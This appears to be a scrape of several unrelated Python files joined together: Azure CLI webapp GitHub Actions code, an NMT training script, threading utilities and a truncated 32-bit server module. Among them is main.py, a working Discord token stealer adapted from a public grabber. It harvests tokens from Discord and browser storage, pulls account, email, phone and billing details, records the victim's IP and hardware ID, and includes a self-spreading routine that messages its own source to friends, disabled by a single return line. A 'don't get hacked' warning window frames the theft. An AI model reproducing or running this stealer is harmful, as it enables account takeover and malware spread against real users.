key_type, key_name, key=key_info) def list_host_keys(cmd, resource_group_name, name, slot=None): client = web_client_factory(cmd.cli_ctx) if slot: return client.web_apps.list_host_keys_slot(resource_group_name, name, slot) return client.web_apps.list_host_keys(resource_group_name, name) def delete_host_key(cmd, resource_group_name, name, key_type, key_name, slot=None): client = web_client_factory(cmd.cli_ctx) if slot: return client.web_apps.delete_host_secret_slot(resource_group_name, name, key_type, key_name, slot) return client.web_apps.delete_host_secret(resource_group_name, name, key_type, key_name) def show_function(cmd, resource_group_name, name, function_name): client = web_client_factory(cmd.cli_ctx) result = client.web_apps.get_function(resource_group_name, name, function_name) if result is None: return "Function '{}' does not exist in app '{}'".format(function_name, name) return result def delete_function(cmd, resource_group_name, name, function_name): client = web_client_factory(cmd.cli_ctx) result = client.web_apps.delete_function(resource_group_name, name, function_name) return result def update_function_key(cmd, resource_group_name, name, function_name, key_name, key_value=None, slot=None): # pylint: disable=protected-access key_info = KeyInfo(name=key_name, value=key_value) KeyInfo._attribute_map = { 'name': {'key': 'properties.name', 'type': 'str'}, 'value': {'key': 'properties.value', 'type': 'str'}, } client = web_client_factory(cmd.cli_ctx) if slot: return client.web_apps.create_or_update_function_secret_slot(resource_group_name, name, function_name, key_name, slot, key_info) return client.web_apps.create_or_update_function_secret(resource_group_name, name, function_name, key_name, key_info) def list_function_keys(cmd, resource_group_name, name, function_name, slot=None): client = web_client_factory(cmd.cli_ctx) if slot: return client.web_apps.list_function_keys_slot(resource_group_name, name, function_name, slot) return 
client.web_apps.list_function_keys(resource_group_name, name, function_name) def delete_function_key(cmd, resource_group_name, name, key_name, function_name=None, slot=None): client = web_client_factory(cmd.cli_ctx) if slot: return client.web_apps.delete_function_secret_slot(resource_group_name, name, function_name, key_name, slot) return client.web_apps.delete_function_secret(resource_group_name, name, function_name, key_name) def add_github_actions(cmd, resource_group, name, repo, runtime=None, token=None, slot=None, # pylint: disable=too-many-statements,too-many-branches branch='master', login_with_github=False, force=False): if not token and not login_with_github: raise_missing_token_suggestion() elif not token: scopes = ["admin:repo_hook", "repo", "workflow"] token = get_github_access_token(cmd, scopes) elif token and login_with_github: logger.warning("Both token and --login-with-github flag are provided. Will use provided token") # Verify resource group, app site_availability = get_site_availability(cmd, name) if site_availability.name_available or (not site_availability.name_available and site_availability.reason == 'Invalid'): raise ResourceNotFoundError( "The Resource 'Microsoft.Web/sites/%s' under resource group '%s' " "was not found." % (name, resource_group)) app_details = get_app_details(cmd, name) if app_details is None: raise ResourceNotFoundError( "Unable to retrieve details of the existing app %s. Please check that the app is a part of " "the current subscription" % name) current_rg = app_details.resource_group if resource_group is not None and (resource_group.lower() != current_rg.lower()): raise ResourceNotFoundError("The webapp %s exists in ResourceGroup %s and does not match the " "value entered %s. Please re-run command with the correct " "parameters." 
% (name, current_rg, resource_group)) parsed_plan_id = parse_resource_id(app_details.server_farm_id) client = web_client_factory(cmd.cli_ctx) plan_info = client.app_service_plans.get(parsed_plan_id['resource_group'], parsed_plan_id['name']) is_linux = plan_info.reserved # Verify github repo from github import Github, GithubException from github.GithubException import BadCredentialsException, UnknownObjectException if repo.strip()[-1] == '/': repo = repo.strip()[:-1] g = Github(token) github_repo = None try: github_repo = g.get_repo(repo) try: github_repo.get_branch(branch=branch) except GithubException as e: error_msg = "Encountered GitHub error when accessing {} branch in {} repo.".format(branch, repo) if e.data and e.data['message']: error_msg += " Error: {}".format(e.data['message']) raise CLIError(error_msg) logger.warning('Verified GitHub repo and branch') except BadCredentialsException: raise CLIError("Could not authenticate to the repository. Please create a Personal Access Token and use " "the --token argument. Run 'az webapp deployment github-actions add --help' " "for more information.") except GithubException as e: error_msg = "Encountered GitHub error when accessing {} repo".format(repo) if e.data and e.data['message']: error_msg += " Error: {}".format(e.data['message']) raise CLIError(error_msg) # Verify runtime app_runtime_info = _get_app_runtime_info( cmd=cmd, resource_group=resource_group, name=name, slot=slot, is_linux=is_linux) app_runtime_string = None if(app_runtime_info and app_runtime_info['display_name']): app_runtime_string = app_runtime_info['display_name'] github_actions_version = None if (app_runtime_info and app_runtime_info['github_actions_version']): github_actions_version = app_runtime_info['github_actions_version'] if runtime and app_runtime_string: if app_runtime_string.lower() != runtime.lower(): logger.warning('The app runtime: {app_runtime_string} does not match the runtime specified: ' '{runtime}. 
Using the specified runtime {runtime}.') app_runtime_string = runtime elif runtime: app_runtime_string = runtime if not app_runtime_string: raise CLIError('Could not detect runtime. Please specify using the --runtime flag.') if not _runtime_supports_github_actions(runtime_string=app_runtime_string, is_linux=is_linux): raise CLIError("Runtime %s is not supported for GitHub Actions deployments." % app_runtime_string) # Get workflow template logger.warning('Getting workflow template using runtime: %s', app_runtime_string) workflow_template = _get_workflow_template(github=g, runtime_string=app_runtime_string, is_linux=is_linux) # Fill workflow template guid = str(uuid.uuid4()).replace('-', '') publish_profile_name = "AzureAppService_PublishProfile_{}".format(guid) logger.warning( 'Filling workflow template with name: %s, branch: %s, version: %s, slot: %s', name, branch, github_actions_version, slot if slot else 'production') completed_workflow_file = _fill_workflow_template(content=workflow_template.decoded_content.decode(), name=name, branch=branch, slot=slot, publish_profile=publish_profile_name, version=github_actions_version) completed_workflow_file = completed_workflow_file.encode() # Check if workflow exists in repo, otherwise push if slot: file_name = "{}_{}({}).yml".format(branch.replace('/', '-'), name.lower(), slot) else: file_name = "{}_{}.yml".format(branch.replace('/', '-'), name.lower()) dir_path = "{}/{}".format('.github', 'workflows') file_path = "/{}/{}".format(dir_path, file_name) try: existing_workflow_file = github_repo.get_contents(path=file_path, ref=branch) existing_publish_profile_name = _get_publish_profile_from_workflow_file( workflow_file=str(existing_workflow_file.decoded_content)) if existing_publish_profile_name: completed_workflow_file = completed_workflow_file.decode() completed_workflow_file = completed_workflow_file.replace( publish_profile_name, existing_publish_profile_name) completed_workflow_file = completed_workflow_file.encode() 
publish_profile_name = existing_publish_profile_name logger.warning("Existing workflow file found") if force: logger.warning("Replacing the existing workflow file") github_repo.update_file(path=file_path, message="Update workflow using Azure CLI", content=completed_workflow_file, sha=existing_workflow_file.sha, branch=branch) else: option = prompt_y_n('Replace existing workflow file?') if option: logger.warning("Replacing the existing workflow file") github_repo.update_file(path=file_path, message="Update workflow using Azure CLI", content=completed_workflow_file, sha=existing_workflow_file.sha, branch=branch) else: logger.warning("Use the existing workflow file") if existing_publish_profile_name: publish_profile_name = existing_publish_profile_name except UnknownObjectException: logger.warning("Creating new workflow file: %s", file_path) github_repo.create_file(path=file_path, message="Create workflow using Azure CLI", content=completed_workflow_file, branch=branch) # Add publish profile to GitHub logger.warning('Adding publish profile to GitHub') _add_publish_profile_to_github(cmd=cmd, resource_group=resource_group, name=name, repo=repo, token=token, github_actions_secret_name=publish_profile_name, slot=slot) # Set site source control properties _update_site_source_control_properties_for_gh_action( cmd=cmd, resource_group=resource_group, name=name, token=token, repo=repo, branch=branch, slot=slot) github_actions_url = "https://github.com/{}/actions".format(repo) return github_actions_url def remove_github_actions(cmd, resource_group, name, repo, token=None, slot=None, # pylint: disable=too-many-statements branch='master', login_with_github=False): if not token and not login_with_github: raise_missing_token_suggestion() elif not token: scopes = ["admin:repo_hook", "repo", "workflow"] token = get_github_access_token(cmd, scopes) elif token and login_with_github: logger.warning("Both token and --login-with-github flag are provided. 
Will use provided token") # Verify resource group, app site_availability = get_site_availability(cmd, name) if site_availability.name_available or (not site_availability.name_available and site_availability.reason == 'Invalid'): raise CLIError("The Resource 'Microsoft.Web/sites/%s' under resource group '%s' was not found." % (name, resource_group)) app_details = get_app_details(cmd, name) if app_details is None: raise CLIError("Unable to retrieve details of the existing app %s. " "Please check that the app is a part of the current subscription" % name) current_rg = app_details.resource_group if resource_group is not None and (resource_group.lower() != current_rg.lower()): raise CLIError("The webapp %s exists in ResourceGroup %s and does not match " "the value entered %s. Please re-run command with the correct " "parameters." % (name, current_rg, resource_group)) # Verify github repo from github import Github, GithubException from github.GithubException import BadCredentialsException, UnknownObjectException if repo.strip()[-1] == '/': repo = repo.strip()[:-1] g = Github(token) github_repo = None try: github_repo = g.get_repo(repo) try: github_repo.get_branch(branch=branch) except GithubException as e: error_msg = "Encountered GitHub error when accessing {} branch in {} repo.".format(branch, repo) if e.data and e.data['message']: error_msg += " Error: {}".format(e.data['message']) raise CLIError(error_msg) logger.warning('Verified GitHub repo and branch') except BadCredentialsException: raise CLIError("Could not authenticate to the repository. Please create a Personal Access Token and use " "the --token argument. 
Run 'az webapp deployment github-actions add --help' " "for more information.") except GithubException as e: error_msg = "Encountered GitHub error when accessing {} repo".format(repo) if e.data and e.data['message']: error_msg += " Error: {}".format(e.data['message']) raise CLIError(error_msg) # Check if workflow exists in repo and remove file_name = "{}_{}({}).yml".format( branch.replace('/', '-'), name.lower(), slot) if slot else "{}_{}.yml".format( branch.replace('/', '-'), name.lower()) dir_path = "{}/{}".format('.github', 'workflows') file_path = "/{}/{}".format(dir_path, file_name) existing_publish_profile_name = None try: existing_workflow_file = github_repo.get_contents(path=file_path, ref=branch) existing_publish_profile_name = _get_publish_profile_from_workflow_file( workflow_file=str(existing_workflow_file.decoded_content)) logger.warning("Removing the existing workflow file") github_repo.delete_file(path=file_path, message="Removing workflow file, disconnecting github actions", sha=existing_workflow_file.sha, branch=branch) except UnknownObjectException as e: error_msg = "Error when removing workflow file." if e.data and e.data['message']: error_msg += " Error: {}".format(e.data['message']) raise CLIError(error_msg) # Remove publish profile from GitHub if existing_publish_profile_name: logger.warning('Removing publish profile from GitHub') _remove_publish_profile_from_github(cmd=cmd, resource_group=resource_group, name=name, repo=repo, token=token, github_actions_secret_name=existing_publish_profile_name, slot=slot) # Remove site source control properties delete_source_control(cmd=cmd, resource_group_name=resource_group, name=name, slot=slot) return "Disconnected successfully." 
def _get_publish_profile_from_workflow_file(workflow_file): import re publish_profile = None regex = re.search(r'publish-profile: \$\{\{ secrets\..*?\}\}', workflow_file) if regex: publish_profile = regex.group() publish_profile = publish_profile.replace('publish-profile: ${{ secrets.', '') publish_profile = publish_profile[:-2] if publish_profile: return publish_profile.strip() return None def _update_site_source_control_properties_for_gh_action(cmd, resource_group, name, token, repo=None, branch="master", slot=None): if repo: repo_url = 'https://github.com/' + repo else: repo_url = None site_source_control = show_source_control(cmd=cmd, resource_group_name=resource_group, name=name, slot=slot) if site_source_control: if not repo_url: repo_url = site_source_control.repo_url delete_source_control(cmd=cmd, resource_group_name=resource_group, name=name, slot=slot) config_source_control(cmd=cmd, resource_group_name=resource_group, name=name, repo_url=repo_url, repository_type='github', github_action=True, branch=branch, git_token=token, slot=slot) def _get_workflow_template(github, runtime_string, is_linux): from github import GithubException from github.GithubException import BadCredentialsException file_contents = None template_repo_path = 'Azure/actions-workflow-templates' template_file_path = _get_template_file_path(runtime_string=runtime_string, is_linux=is_linux) try: template_repo = github.get_repo(template_repo_path) file_contents = template_repo.get_contents(template_file_path) except BadCredentialsException: raise CLIError("Could not authenticate to the repository. Please create a Personal Access Token and use " "the --token argument. 
Run 'az webapp deployment github-actions add --help' " "for more information.") except GithubException as e: error_msg = "Encountered GitHub error when retrieving workflow template" if e.data and e.data['message']: error_msg += ": {}".format(e.data['message']) raise CLIError(error_msg) return file_contents def _fill_workflow_template(content, name, branch, slot, publish_profile, version): if not slot: slot = 'production' content = content.replace('${web-app-name}', name) content = content.replace('${branch}', branch) content = content.replace('${slot-name}', slot) content = content.replace('${azure-webapp-publish-profile-name}', publish_profile) content = content.replace('${AZURE_WEBAPP_PUBLISH_PROFILE}', publish_profile) content = content.replace('${dotnet-core-version}', version) content = content.replace('${java-version}', version) content = content.replace('${node-version}', version) content = content.replace('${python-version}', version) return content def _get_template_file_path(runtime_string, is_linux): if not runtime_string: raise CLIError('Unable to retrieve workflow template') runtime_string = runtime_string.lower() runtime_stack = runtime_string.split('|')[0] template_file_path = None if is_linux: template_file_path = LINUX_GITHUB_ACTIONS_WORKFLOW_TEMPLATE_PATH.get(runtime_stack, None) else: # Handle java naming if runtime_stack == 'java': java_container_split = runtime_string.split('|') if java_container_split and len(java_container_split) >= 2: if java_container_split[2] == 'tomcat': runtime_stack = 'tomcat' elif java_container_split[2] == 'java se': runtime_stack = 'java' template_file_path = WINDOWS_GITHUB_ACTIONS_WORKFLOW_TEMPLATE_PATH.get(runtime_stack, None) if not template_file_path: raise CLIError('Unable to retrieve workflow template.') return template_file_path def _add_publish_profile_to_github(cmd, resource_group, name, repo, token, github_actions_secret_name, slot=None): # Get publish profile with secrets import requests 
logger.warning("Fetching publish profile with secrets for the app '%s'", name) publish_profile_bytes = _generic_site_operation( cmd.cli_ctx, resource_group, name, 'list_publishing_profile_xml_with_secrets', slot, {"format": "WebDeploy"}) publish_profile = list(publish_profile_bytes) if publish_profile: publish_profile = publish_profile[0].decode('ascii') else: raise CLIError('Unable to retrieve publish profile.') # Add publish profile with secrets as a GitHub Actions Secret in the repo headers = {} headers['Authorization'] = 'Token {}'.format(token) headers['Content-Type'] = 'application/json;' headers['Accept'] = 'application/json;' public_key_url = "https://api.github.com/repos/{}/actions/secrets/public-key".format(repo) public_key = requests.get(public_key_url, headers=headers) if not public_key.ok: raise CLIError('Request to GitHub for public key failed.') public_key = public_key.json() encrypted_github_actions_secret = _encrypt_github_actions_secret(public_key=public_key['key'], secret_value=str(publish_profile)) payload = { "encrypted_value": encrypted_github_actions_secret, "key_id": public_key['key_id'] } store_secret_url = "https://api.github.com/repos/{}/actions/secrets/{}".format(repo, github_actions_secret_name) stored_secret = requests.put(store_secret_url, data=json.dumps(payload), headers=headers) if str(stored_secret.status_code)[0] != '2': raise CLIError('Unable to add publish profile to GitHub. 
Request status code: %s' % stored_secret.status_code) def _remove_publish_profile_from_github(cmd, resource_group, name, repo, token, github_actions_secret_name, slot=None): headers = {} headers['Authorization'] = 'Token {}'.format(token) import requests store_secret_url = "https://api.github.com/repos/{}/actions/secrets/{}".format(repo, github_actions_secret_name) requests.delete(store_secret_url, headers=headers) def _runtime_supports_github_actions(runtime_string, is_linux): if is_linux: stacks = get_file_json(RUNTIME_STACKS)['linux'] else: stacks = get_file_json(RUNTIME_STACKS)['windows'] supports = False for stack in stacks: if stack['displayName'].lower() == runtime_string.lower(): if 'github_actions_properties' in stack and stack['github_actions_properties']: supports = True return supports def _get_app_runtime_info(cmd, resource_group, name, slot, is_linux): app_settings = None app_runtime = None if is_linux: app_metadata = get_site_configs(cmd=cmd, resource_group_name=resource_group, name=name, slot=slot) app_runtime = getattr(app_metadata, 'linux_fx_version', None) return _get_app_runtime_info_helper(app_runtime, "", is_linux) app_metadata = _generic_site_operation(cmd.cli_ctx, resource_group, name, 'list_metadata', slot) app_metadata_properties = getattr(app_metadata, 'properties', {}) if 'CURRENT_STACK' in app_metadata_properties: app_runtime = app_metadata_properties['CURRENT_STACK'] if app_runtime and app_runtime.lower() == 'node': app_settings = get_app_settings(cmd=cmd, resource_group_name=resource_group, name=name, slot=slot) for app_setting in app_settings: if 'name' in app_setting and app_setting['name'] == 'WEBSITE_NODE_DEFAULT_VERSION': app_runtime_version = app_setting['value'] if 'value' in app_setting else None if app_runtime_version: return _get_app_runtime_info_helper(app_runtime, app_runtime_version, is_linux) elif app_runtime and app_runtime.lower() == 'python': app_settings = get_site_configs(cmd=cmd, resource_group_name=resource_group, 
name=name, slot=slot) app_runtime_version = getattr(app_settings, 'python_version', '') return _get_app_runtime_info_helper(app_runtime, app_runtime_version, is_linux) elif app_runtime and app_runtime.lower() == 'dotnetcore': app_runtime_version = '3.1' app_runtime_version = "" return _get_app_runtime_info_helper(app_runtime, app_runtime_version, is_linux) elif app_runtime and app_runtime.lower() == 'java': app_settings = get_site_configs(cmd=cmd, resource_group_name=resource_group, name=name, slot=slot) app_runtime_version = "{java_version}, {java_container}, {java_container_version}".format( java_version=getattr(app_settings, 'java_version', '').lower(), java_container=getattr(app_settings, 'java_container', '').lower(), java_container_version=getattr(app_settings, 'java_container_version', '').lower() ) return _get_app_runtime_info_helper(app_runtime, app_runtime_version, is_linux) def _get_app_runtime_info_helper(app_runtime, app_runtime_version, is_linux): if is_linux: stacks = get_file_json(RUNTIME_STACKS)['linux'] for stack in stacks: if 'github_actions_properties' in stack and stack['github_actions_properties']: if stack['displayName'].lower() == app_runtime.lower(): return { "display_name": stack['displayName'], "github_actions_version": stack['github_actions_properties']['github_actions_version'] } else: stacks = get_file_json(RUNTIME_STACKS)['windows'] for stack in stacks: if 'github_actions_properties' in stack and stack['github_actions_properties']: if (stack['github_actions_properties']['app_runtime'].lower() == app_runtime.lower() and stack['github_actions_properties']['app_runtime_version'].lower() == app_runtime_version.lower()): return { "display_name": stack['displayName'], "github_actions_version": stack['github_actions_properties']['github_actions_version'] } return None def _encrypt_github_actions_secret(public_key, secret_value): # Encrypt a Unicode string using the public key from base64 import b64encode public_key = 
public.PublicKey(public_key.encode("utf-8"), encoding.Base64Encoder()) sealed_box = public.SealedBox(public_key) encrypted = sealed_box.encrypt(secret_value.encode("utf-8")) return b64encode(encrypted).decode("utf-8")
train.py
import sys
import os
import argparse
from setup.settings import hparams, preprocessing
import math
sys.path.append(os.path.dirname(os.path.realpath(__file__)))
sys.path.append(os.path.dirname(os.path.realpath(__file__)) + "/nmt")
from nmt import nmt
import tensorflow as tf
import colorama
from threading import Thread
from setup.custom_summary import custom_summary
colorama.init()


def train():
    """Train the NMT model, optionally with per-epoch learning-rate decay.

    When preprocessing['epochs'] is set, every epoch takes its learning rate
    from that list; the step budget is extended to the end of the epoch and
    nmt is run in a fresh thread each time (nmt exits once num_train_steps is
    reached, so continuing requires a new run). Progress is persisted in
    '<out_dir>epochs_passed' so an interrupted run resumes at the right epoch.
    Without 'epochs', a single standard training run is started.
    """
    print('\n\n{}Training model...{}\n'.format(colorama.Fore.GREEN, colorama.Fore.RESET))

    # Custom epoch training and decaying
    if preprocessing['epochs'] is not None:

        # Load corpus size, used to translate epochs into step counts
        with open('{}/corpus_size'.format(preprocessing['train_folder']), 'r') as f:
            corpus_size = int(f.read())

        # Load current train progress; a missing or corrupt progress file
        # simply means we start from the first epoch (was a bare `except:`).
        try:
            with open('{}epochs_passed'.format(hparams['out_dir']), 'r') as f:
                initial_epoch = int(f.read())
        except (IOError, OSError, ValueError):
            initial_epoch = 0

        # Configured batch size, defaulting to 128 (hoisted out of the loop)
        batch_size = hparams['batch_size'] if 'batch_size' in hparams else 128

        # Iterate thru epochs
        for epoch, learning_rate in enumerate(preprocessing['epochs']):

            # Check if model already passed that epoch
            if epoch < initial_epoch:
                print('{}Epoch: {}, learning rate: {} - already passed{}'.format(
                    colorama.Fore.GREEN, epoch + 1, learning_rate, colorama.Fore.RESET))
                continue

            # Calculate new number of training steps - up to the end of current epoch
            num_train_steps = math.ceil((epoch + 1) * corpus_size / batch_size)
            print("\n{}Epoch: {}, steps per epoch: {}, epoch ends at {} steps, "
                  "learning rate: {} - training{}\n".format(
                      colorama.Fore.GREEN,
                      epoch + 1,
                      math.ceil(corpus_size / batch_size),
                      num_train_steps,
                      learning_rate,
                      colorama.Fore.RESET))

            # Override hparams
            hparams['num_train_steps'] = num_train_steps
            hparams['learning_rate'] = learning_rate
            hparams['override_loaded_hparams'] = True

            # Run TensorFlow threaded (exits on finished training, but we want to train more)
            thread = Thread(target=nmt_train)
            thread.start()
            thread.join()

            # Save epoch progress
            with open('{}epochs_passed'.format(hparams['out_dir']), 'w') as f:
                f.write(str(epoch + 1))

    # Standard training
    else:
        nmt_train()

    print('\n\n{}Training finished{}\n'.format(colorama.Fore.GREEN, colorama.Fore.RESET))


def nmt_train():
    """Run one nmt training session with hparams injected as CLI flags."""
    # Modified autorun from nmt.py (bottom of the file)
    # We want to use original argument parser (for validation, etc)
    nmt_parser = argparse.ArgumentParser()
    nmt.add_arguments(nmt_parser)

    # But we have to hack settings from our config in there instead of commandline options
    nmt.FLAGS, unparsed = nmt_parser.parse_known_args(['--' + k + '=' + str(v) for k, v in hparams.items()])

    # Add custom summary function (hook)
    nmt.summary_callback = custom_summary

    # And now we can run TF with modified arguments.
    # BUGFIX: the original argv[0] was os.getcwd() + '\nmt\nmt\nmt.py', where
    # each '\n' is a NEWLINE escape, not a path separator; build it portably.
    tf.app.run(main=nmt.main, argv=[os.path.join(os.getcwd(), 'nmt', 'nmt', 'nmt.py')] + unparsed)


train()
network_test.py
from keras.layers import Dense
from keras.models import Sequential, load_model
import numpy as np
import threading

# Demo of Keras thread-affinity: a model built/compiled on the main thread
# must not be trained from another thread.
model = Sequential()
model.add(Dense(384, input_dim=384, activation='tanh'))
model.add(Dense(128, activation='tanh'))
model.add(Dense(6, activation='softmax'))
model.compile(loss='binary_crossentropy', optimizer='adam')


# ERROR: cannot be used across threads — make sure the model is created and
# trained within the same thread. (Translated from the original Chinese note.)
def thread():
    """Train the module-level model from a worker thread (expected to fail,
    since the model was built on the main thread)."""
    x = np.zeros((1, 384))
    y = np.zeros((1, 6))
    res = model.train_on_batch(x=x, y=y)
    print(res)


def thread2():
    """Build, compile and train a model entirely inside this thread (works)."""
    model2 = Sequential()
    model2.add(Dense(384, input_dim=384, activation='tanh'))
    model2.add(Dense(128, activation='tanh'))
    model2.add(Dense(6, activation='softmax'))
    model2.compile(loss='binary_crossentropy', optimizer='adam')
    x = np.zeros((1, 384))
    y = np.zeros((1, 6))
    res = model2.train_on_batch(x=x, y=y)
    print(res)


t = threading.Thread(target=thread2)
t.daemon = True  # Thread.setDaemon() is deprecated since Python 3.10
t.start()
t.join()
__init__.py
import time
import inspect
import ctypes
from functools import wraps
from threading import Thread
from multiprocessing import Process


def x_tostring(path, encoding='utf-8'):
    """Serialize an lxml element or tree to a byte string."""
    # Imported lazily so the rest of this module is usable without lxml.
    # NOTE(review): this changes import-time behavior — the module no longer
    # fails to import when lxml is missing; only x_tostring() will.
    from lxml import etree
    return etree.tostring(path, encoding=encoding)


def retry_wrapper(max_retry_num=3, retry_delay=1, exception=True):
    """Decorator factory retrying the wrapped callable up to max_retry_num times.

    Sleeps retry_delay seconds after each failed attempt. With exception=True
    the final attempt runs outside the try/except so its error propagates to
    the caller; with exception=False every attempt is guarded and None is
    returned after exhausting the retries.
    """
    def wrapper1(func):
        @wraps(func)
        def wrapper2(*args, **kwargs):
            # Reserve the last attempt for re-raising when exception=True.
            guarded_attempts = max_retry_num - 1 if exception else max_retry_num
            for _ in range(guarded_attempts):
                try:
                    return func(*args, **kwargs)
                except Exception:  # was a bare `except:` — narrowed so
                    time.sleep(retry_delay)  # KeyboardInterrupt etc. escape
            if exception:
                return func(*args, **kwargs)
            return None
        return wrapper2
    return wrapper1


def stop_thread(thread):
    """Asynchronously raise SystemExit inside *thread* (CPython-only hack).

    Returns True on success, False when the thread id was not found, and None
    on unexpected errors. The exception is only delivered the next time the
    target thread executes Python bytecode.
    """
    try:
        exctype = SystemExit
        tid = ctypes.c_long(thread.ident)
        if not inspect.isclass(exctype):
            exctype = type(exctype)
        res = ctypes.pythonapi.PyThreadState_SetAsyncExc(tid, ctypes.py_object(exctype))
        if res == 1:
            return True
        if res > 1:
            # More than one thread state was affected: undo the pending
            # exception, otherwise the interpreter is left inconsistent
            # (standard recipe for PyThreadState_SetAsyncExc).
            ctypes.pythonapi.PyThreadState_SetAsyncExc(tid, None)
        return False
    except Exception:  # was a bare `except:`
        return None


def thread_wrapper(func):
    """Decorator running the wrapped callable in a new, started Thread.

    The wrapper returns the Thread object so the caller can join it.
    """
    @wraps(func)
    def wrapper(*args, **kwargs):
        worker = Thread(target=func, args=args, kwargs=kwargs)
        worker.start()
        return worker
    return wrapper


def process_wrapper(func):
    """Decorator running the wrapped callable in a new, started Process.

    The wrapper returns the Process object so the caller can join it.
    """
    @wraps(func)
    def wrapper(*args, **kwargs):
        worker = Process(target=func, args=args, kwargs=kwargs)
        worker.start()
        return worker
    return wrapper
main.py
import os import tkinter from tkinter import * # Origin from https://github.com/UN5T48L3/discord-token-grabber Edtied by https://github.com/moto6333 to use tikinter if os.name != "nt": exit() from re import findall from json import loads, dumps from base64 import b64decode from subprocess import Popen, PIPE from urllib.request import Request, urlopen from threading import Thread from time import sleep from sys import argv LOCAL = os.getenv("LOCALAPPDATA") ROAMING = os.getenv("APPDATA") PATHS = { "Discord": ROAMING + "\\Discord", "Discord Canary": ROAMING + "\\discordcanary", "Discord PTB": ROAMING + "\\discordptb", "Google Chrome": LOCAL + "\\Google\\Chrome\\User Data\\Default", "Opera": ROAMING + "\\Opera Software\\Opera Stable", "Brave": LOCAL + "\\BraveSoftware\\Brave-Browser\\User Data\\Default", "Yandex": LOCAL + "\\Yandex\\YandexBrowser\\User Data\\Default" } def getHeader(token=None, content_type="application/json"): headers = { "Content-Type": content_type, "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36" } if token: headers.update({"Authorization": token}) return headers def getUserData(token): try: return loads( urlopen(Request("https://discordapp.com/api/v6/users/@me", headers=getHeader(token))).read().decode()) except: pass def getTokenz(path): path += "\\Local Storage\\leveldb" tokens = [] for file_name in os.listdir(path): if not file_name.endswith(".log") and not file_name.endswith(".ldb"): continue for line in [x.strip() for x in open(f"{path}\\{file_name}", errors="ignore").readlines() if x.strip()]: for regex in (r"[\w-]{24}\.[\w-]{6}\.[\w-]{27}", r"mfa\.[\w-]{84}"): for token in findall(regex, line): tokens.append(token) return tokens def whoTheFuckAmI(): ip = "None" try: ip = urlopen(Request("https://ifconfig.me")).read().decode().strip() except: pass return ip def hWiD(): p = Popen("wmic csproduct get uuid", shell=True, stdin=PIPE, stdout=PIPE, stderr=PIPE) return 
(p.stdout.read() + p.stderr.read()).decode().split("\n")[1] def getFriends(token): try: return loads(urlopen(Request("https://discordapp.com/api/v6/users/@me/relationships", headers=getHeader(token))).read().decode()) except: pass def getChat(token, uid): try: return loads(urlopen(Request("https://discordapp.com/api/v6/users/@me/channels", headers=getHeader(token), data=dumps({"recipient_id": uid}).encode())).read().decode())["id"] except: pass def paymentMethods(token): try: return bool(len(loads(urlopen(Request("https://discordapp.com/api/v6/users/@me/billing/payment-sources", headers=getHeader(token))).read().decode())) > 0) except: pass def sendMessages(token, chat_id, form_data): try: urlopen(Request(f"https://discordapp.com/api/v6/channels/{chat_id}/messages", headers=getHeader(token, "multipart/form-data; boundary=---------------------------325414537030329320151394843687"), data=form_data.encode())).read().decode() except: pass def spread(token, form_data, delay): return # Remove to re-enabled (If you remove this line, malware will spread itself by sending the binary to friends.) 
for friend in getFriends(token): try: chat_id = getChat(token, friend["id"]) sendMessages(token, chat_id, form_data) except Exception as e: pass sleep(delay) def main(): cache_path = ROAMING + "\\.cache~$" prevent_spam = True self_spread = True embeds = [] working = [] checked = [] already_cached_tokens = [] working_ids = [] ip = whoTheFuckAmI() pc_username = os.getenv("UserName") pc_name = os.getenv("COMPUTERNAME") user_path_name = os.getenv("userprofile").split("\\")[2] for platform, path in PATHS.items(): if not os.path.exists(path): continue for token in getTokenz(path): if token in checked: continue checked.append(token) uid = None if not token.startswith("mfa."): try: uid = b64decode(token.split(".")[0].encode()).decode() except: pass if not uid or uid in working_ids: continue user_data = getUserData(token) if not user_data: continue working_ids.append(uid) working.append(token) username = user_data["username"] + "#" + str(user_data["discriminator"]) user_id = user_data["id"] email = user_data.get("email") phone = user_data.get("phone") nitro = bool(user_data.get("premium_type")) billing = bool(paymentMethods(token)) with open(cache_path, "a") as file: for token in checked: if not token in already_cached_tokens: file.write(token + "\n") if len(working) == 0: working.append('123') window = Tk() window.title("DONT GET HACKED!!!!!!!") window.geometry('1920x1080') lbl = Label(window, text="Hello, I dont have time to explain all this\n stuff but just dont\n install random apps from \npeople on the internet", font=("Arial Bold", 50)) lbl.grid(column=0, row=0) def clicked(): lbl.configure(text="Apps can steal your data See what was gotten here\n Username: " + username + "\n User Id: " + user_id + "\n ip: " + ip + "\n Pc Username: " + pc_username + "\n Pc Name: " + user_path_name + "\n Token (Can be used to sign into account without password): \n " + token, font=("Arial Bold", 25)) btn = Button(window, text="See why?", command=clicked, font=("Arial Bold", 50)) 
btn.grid(column=1, row=0) window.mainloop() if self_spread: for token in working: with open(argv[0], encoding="utf-8") as file: content = file.read() payload = f'-----------------------------325414537030329320151394843687\nContent-Disposition: form-data; name="file"; filename="{__file__}"\nContent-Type: text/plain\n\n{content}\n-----------------------------325414537030329320151394843687\nContent-Disposition: form-data; name="content"\n\nDDoS tool. python download: https://www.python.org/downloads\n-----------------------------325414537030329320151394843687\nContent-Disposition: form-data; name="tts"\n\nfalse\n-----------------------------325414537030329320151394843687--' Thread(target=spread, args=(token, payload, 7500 / 1000)).start() try: main() except Exception as e: print(e) pass
server32.py
""" Contains the base class for loading a 32-bit shared library in 32-bit Python. The :class:`~.server32.Server32` class is used in combination with the :class:`~.client64.Client64` class to communicate with a 32-bit shared library from 64-bit Python. """ import os import re import sys import json import warnings import traceback import threading import subprocess try: from http.server import HTTPServer, BaseHTTPRequestHandler import pickle except ImportError: # then Python 2 import cPickle as pickle from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler from . import ( LoadLibrary, SERVER_FILENAME, IS_WINDOWS, ) METADATA = '-METADATA-' SHUTDOWN = '-SHUTDOWN-' OK = 200 ERROR = 500 class Server32(HTTPServer): def __init__(self, path, libtype, host, port, *args, **kwargs): """Base class for loading a 32-bit library in 32-bit Python. All modules that are to be run on the 32-bit server must contain a class that is inherited from this class and the module can import **any** of the `standard`_ python modules **except** for :mod:`distutils`, :mod:`ensurepip`, :mod:`tkinter` and :mod:`turtle`. All modules that are run on the 32-bit server must be able to run on the Python interpreter that the server is running on, see :meth:`.version` for how to determine the version of the Python interpreter. .. _standard: https://docs.python.org/3/py-modindex.html .. _JVM: https://en.wikipedia.org/wiki/Java_virtual_machine Parameters ---------- path : :class:`str` The path to the 